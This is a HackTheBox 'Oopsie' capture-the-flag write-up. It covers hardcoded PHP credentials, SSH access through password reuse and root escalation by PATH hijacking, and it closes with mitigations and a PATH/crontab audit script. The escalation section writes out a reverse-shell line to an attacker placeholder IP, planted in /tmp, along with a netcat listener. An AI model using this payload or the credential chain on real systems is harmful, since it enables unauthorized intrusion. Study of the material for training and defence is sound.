HackTheBox: Oopsie Writeup


Overview

Oopsie is a Linux-based HackTheBox machine that involves web application authentication bypass, database credential extraction, and privilege escalation through PATH manipulation. This writeup covers the complete exploitation process.

Reconnaissance

Port Scanning

We begin with a comprehensive port scan:

nmap -sV -sC -p- <HTB_IP>

Open Ports:

  • 22/tcp – OpenSSH 7.6p1 Ubuntu
  • 80/tcp – Apache httpd 2.4.29 (Ubuntu)

The target is running a standard LAMP stack on Ubuntu Linux.

Web Application Enumeration

Browsing to http://<HTB_IP> reveals a web application. Initial enumeration shows it’s a custom application that requires authentication.

Initial Access

Authentication Bypass

Through source code analysis or directory enumeration, we locate the login handler. The PHP code contains hardcoded credentials:

if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")

Credentials:

  • Username: admin
  • Password: MEGACORP_4dm1n!!

We can use these credentials to log into the web application.

Database Credential Discovery

After authenticating, we explore the application’s functionality. Through source code analysis or application behavior, we discover database connection credentials:

$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');

Database Credentials:

  • Host: localhost
  • Username: robert
  • Password: M3g4C0rpUs3r!
  • Database: garage

SSH Access

With the database credentials, we can attempt to access the system via SSH. The username robert and password M3g4C0rpUs3r! allow us to establish an SSH connection:

ssh robert@<HTB_IP>

We now have user-level access to the system.

Privilege Escalation

Enumeration

After gaining initial access, we perform standard enumeration to identify privilege escalation vectors. We check for SUID binaries, writable files, cron jobs, and other common misconfigurations.

PATH Manipulation

During enumeration, we discover that we can manipulate the PATH environment variable. The current PATH is:

/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

Notice that /tmp is at the beginning of the PATH, which means executables in /tmp will be executed before system binaries if they share the same name.

Exploiting PATH

We can exploit this by:

  1. Creating a malicious binary in /tmp with a name that matches a binary executed by root (or another privileged user) via a cron job or SUID binary.
  2. Setting the PATH to prioritize /tmp:

     export PATH=/tmp:$PATH

  3. Creating the malicious binary (e.g., if a cron job runs a binary without an absolute path):

     echo '#!/bin/bash' > /tmp/binary_name
     echo 'bash -i >& /dev/tcp/<Attacker_ip>/4444 0>&1' >> /tmp/binary_name
     chmod +x /tmp/binary_name

  4. Setting up a listener:

     nc -lvnp 4444

  5. Waiting for execution, or triggering it if possible.

Alternatively, if we find a SUID binary or a cron job that executes a binary without an absolute path, we can create a malicious version in /tmp that will be executed instead.

Root Access

Once the malicious binary is executed with root privileges, we receive a root shell. We can then retrieve both user and root flags:

cat /home/robert/user.txt
cat /root/root.txt

Key Takeaways

  1. Hardcoded Credentials: Hardcoded credentials in source code are a critical security vulnerability. Always use secure credential storage mechanisms.
  2. Credential Reuse: Database credentials discovered in one context may be reused for system access if password reuse is present.
  3. PATH Manipulation: Having user-controlled directories (like /tmp) at the beginning of the PATH can lead to privilege escalation if privileged processes execute binaries without absolute paths.
  4. Source Code Analysis: Analyzing application source code can reveal authentication mechanisms, database credentials, and other sensitive information.

Mitigation Recommendations

  • Never hardcode credentials in source code; use environment variables or secure credential stores
  • Implement proper password policies and avoid credential reuse across services
  • Ensure PATH environment variables are properly configured and don’t include user-writable directories
  • Use absolute paths when executing binaries in scripts, cron jobs, and SUID binaries
  • Regularly audit and review cron jobs and scheduled tasks
  • Implement proper file permissions and restrict write access to system directories
  • Use tools like sudo with restricted command execution instead of SUID binaries where possible
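The PATH weakness used in the exploitation steps above and the corresponding mitigations (no user-writable directories in PATH, absolute paths in cron jobs, regular cron audits) can be checked with a small audit script. The following is an added example written for this writeup, not code from the box or from HackTheBox. The function names audit_path and audit_cron are my own, and the crontab sample embedded in it is constructed to mirror the pattern on this machine; it is not the machine's real crontab.

```shell
#!/bin/sh
# Added audit example (not part of the original writeup): two checks an
# administrator can run to catch the misconfiguration this box relies on.
#   audit_path  - flags PATH entries that are empty, relative, a shared
#                 scratch directory, or world-writable on disk.
#   audit_cron  - flags crontab commands not given by absolute path and
#                 hands any PATH= line in the crontab to audit_path.
# Both print their findings and return 1 if anything was flagged, else 0.

audit_path() {
    rest="$1:"          # trailing sentinel so the last entry is processed
    path_bad=0
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        case "$dir" in
            "")  echo "RISK empty PATH entry (means current directory) in '$1'"; path_bad=1 ;;
            /tmp|/var/tmp|/dev/shm)
                 echo "RISK shared scratch directory in PATH: $dir"; path_bad=1 ;;
            /*)  # absolute entry: flag it if it exists and is world-writable
                 if [ -d "$dir" ] && [ -n "$(find "$dir" -prune -perm -0002 2>/dev/null)" ]; then
                     echo "RISK world-writable directory in PATH: $dir"; path_bad=1
                 fi ;;
            *)   echo "RISK relative PATH entry: $dir"; path_bad=1 ;;
        esac
    done
    return $path_bad
}

# $1: "user"   -> 5 time fields, then the command (crontab -l format)
#     "system" -> 5 time fields, user, then the command (/etc/crontab, /etc/cron.d)
# Crontab text is read from stdin.
audit_cron() {
    skip=5
    [ "$1" = "system" ] && skip=6
    cron_text=$(cat)
    cron_bad=0
    # Commands that rely on PATH lookup instead of an absolute path
    printf '%s\n' "$cron_text" | awk -v skip="$skip" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }        # comment or blank line
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }      # VAR=value line
        {
            n = skip
            if ($1 ~ /^@/) n = skip - 4     # @reboot etc. stands in for the 5 time fields
            cmd = $(n + 1)
            if (cmd !~ /^\//) { print "RISK cron command not absolute: " $0; bad = 1 }
        }
        END { exit bad ? 1 : 0 }' || cron_bad=1
    # A PATH set inside the crontab is the one cron uses for lookups
    for p in $(printf '%s\n' "$cron_text" | sed -n 's/^[[:space:]]*PATH=//p'); do
        audit_path "$p" || cron_bad=1
    done
    return $cron_bad
}

# Constructed sample (not the box's real crontab): /tmp first in PATH and two
# commands looked up through PATH, which is exactly the pattern exploited above.
SAMPLE_CRONTAB='PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root backup_script
*/5 * * * * root /usr/local/bin/cleanup
@reboot root start_agent'

# Run with "demo" as the first argument to audit the current PATH and the sample.
if [ "${1:-}" = "demo" ]; then
    audit_path "$PATH"
    printf '%s\n' "$SAMPLE_CRONTAB" | audit_cron system
fi
```

On a real host the same functions can be pointed at /etc/crontab and the files under /etc/cron.d (system format) and at each user's crontab -l output (user format); the exit status makes them usable from a configuration-check job.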
